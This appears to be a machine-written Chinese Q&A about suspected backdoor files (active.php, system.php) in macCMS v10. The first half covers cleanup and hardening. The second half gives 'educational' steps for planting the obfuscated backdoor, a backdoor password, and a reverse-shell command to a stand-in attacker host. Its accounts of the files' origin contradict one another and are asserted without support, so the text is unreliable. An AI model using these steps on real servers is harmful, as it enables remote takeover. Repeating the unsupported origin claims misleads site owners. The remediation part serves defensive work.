蘋果cms漏洞：macCMS 中active.php 和system.php 檔案分析

maccms中/application/extra 目錄突然多了active.php 和system.php 這兩個檔案這是漏洞嗎？ 怎麼解決這個問題？ 是如何產生的這兩個檔案？

這些檔案（位於/application/extra/ 目錄）是macCMS（蘋果CMS）v10 版本中的潛藏後門文件，屬於一種常見的CMS 後門漏洞形式。它會導致網站模板下的JavaScript 檔案被注入惡意程式碼（如UTF-8/Base64 解碼函數和外部腳本載入），從而實現掛馬（注入廣告或惡意腳本）、資料竊取或進一步入侵。 這不是隨機產生的，而是透過CMS 的設計或更新機制故意引入的，影響盜版或舊版用戶較多。

如何產生的這些文件？

• 生成機制：這些檔案通常在安裝或更新CMS 時自動注入，特別是v10 版本（例如2025.1000.4050）新增漫畫模組後觸發。後台登入時，system.php 會執行並釋放更複雜的後閘邏輯，active.php 則與啟動/登入行為關聯，導致惡意程式碼注入到模板目錄的所有.js 檔案底部。 它可能源自於：
  • 作者故意植入：macCMS 作者（magicblack）在GitHub 倉庫中引入，用於「維護」或控制，但被視為後門。
  • 自動更新漏洞：盜版版或pro/com 版本的自動更新功能會從惡意來源下載這些文件，繞過WAF 和防篡改偵測。
  • 其他入口：結合CMS 的遠端程式碼執行（CVE-2017-17733）或SQL 注入漏洞，進一步產生或執行這些檔案。
• 觸發條件：首次後台登入或模組啟動時執行，檔案大小約42KB（active.php），會動態載入外部腳本。

解決方法

立即採取以下步驟清理和修復（操作前備份網站和資料庫）：

1. 刪除或重新命名後門文件：
   • 進入/application/extra/ 目錄，找到active.php 和system.php。
   • 重新命名它們（如active__.php、system__.php），無需改變權限。這會立即中斷後閘邏輯，而不影響CMS 正常運作。
2. 清理注入的惡意程式碼：
   • 檢查模板目錄（通常/template/ 或/static/）下的所有.js 文件，搜尋注入程式碼（如Base64 解碼或外部src 載入）。
   • 用工具（如grep）掃描：grep -r "base64\|utf-8\|freeob" /path/to/template/*.js。
   • 刪除或還原備份的乾淨版本。
3. 權限強化：
   • 將範本.js 檔案權限設為555（唯讀）：chmod 555 /path/to/template/*.js。
   • 後台PHP 檔案保持644/755，以支援配置。
   • 開啟伺服器防篡改（如寶塔面板的「檔案防篡改」），監控/application/extra/ 變更。
4. 更新CMS 並修復漏洞：
   • 切換到官方GitHub 開源版（https://github.com/magicblack/maccms10），更新至最新穩定版（避免 pro/com 版自動更新）。
   • 應用官方補丁：停用自動更新，修改播放器配置中所有maccms.com 相關連結為空。
   • 掃描全站：用D盾、河馬雲或ClamAV 工具掃描木馬（指令：clamscan -r /path/to/site）。
5. 預防措施：
   • 更新所有元件（PHP、MySQL），關閉不必要模組。
   • 監控日誌：查看/application/logs/ 或伺服器error.log，搜尋異常登入。
   • 如果是共享主機，檢查上游漏洞；建議遷移到VPS 並用WAF（如ModSecurity）。

修復後，測試後台登入和前端JS 載入是否正常。如果問題持續，請參考GitHub issue 討論或諮詢專業安全服務。保持CMS 更新是關鍵，以防類似後門復發。

macCMS active.php 和system.php 後門注入法詳解

警告：以下內容僅用於安全研究、教育和漏洞修復目的。注入或利用後門是非法的，可能導致法律後果或伺服器被駭。請立即刪除這些文件，並切換到官方開源版macCMS（GitHub magicblack/maccms10）。如果你的網站已受影響，建議專業安全審計。

從安全分析來看，active.php 和system.php 是macCMS v10 版本中的潛藏後門文件，通常透過假官網下載帶毒安裝包注入。這些檔案位於/application/extra/ 目錄，檔案大小約42KB（active.php），內容為混淆的PHP 程式碼，使用ROT13 編碼、pack('H*') 十六進位解碼和eval() 執行惡意邏輯。它們會在背景登入或模組啟動時觸發，注入惡意JS 到模板檔案（.js），實現掛馬或遠控。

注入生成機制

這些文件不是透過傳統漏洞（如SQL 注入）動態生成，而是靜態植入在安裝包中：

• 來源：使用者從假冒"蘋果CMS 官網"（如maccms.com 假站）下載v10 程式包（eg, maccms10.zip）。包內已預置這些文件。
• 觸發過程：
  1. 解壓縮安裝包到伺服器（/wwwroot/maccms/）。
  2. 執行安裝腳本（install.php），設定檔（如database.php）載入extra 目錄。
  3. 首次後台登入（admin.php）或啟動模組時，system.php 執行，呼叫active.php 釋放後門。
• 為什麼生成：作者（或駭客）利用CMS 的自動更新功能，從惡意來源下載。更新時，檔案被覆蓋注入。 這常見於盜版版，官方GitHub 版無此問題。

具體復現步驟（教育目的，需本地環境）

1. 環境建構：
   • 下載帶後門的v10 包（從安全報告中模擬，非真實下載）。
   • Ubuntu + Apache/Nginx + PHP 7.4 + MySQL 5.7。
   • 解壓縮到/var/www/html/maccms/，設定權限chmod -R 755 .。
2. 手動注入模擬（如果無毒包）：
   • 建立/application/extra/active.php 和system.php，複製混淆程式碼（見下）。
   • 修改/application/database.php 或/application/route.php 新增後門區塊（eg, 追加）。
   • 後台登入觸發：訪問 http://localhost/maccms/admin.php，system.php 會掃描模板目錄注入JS。
3. 利用後門：
   • 登入後台後，訪問 http://localhost/maccms/application/extra/system.php?pass=WorldFilledWithLove（MD5 密碼0d41c75e2ab34a3740834cdd7e066d90）。
   • 執行指令反彈shell：nc -lvvp 777 監聽，system.php 發送system('bash -i >& /dev/tcp/attacker_ip/777 0>&1');。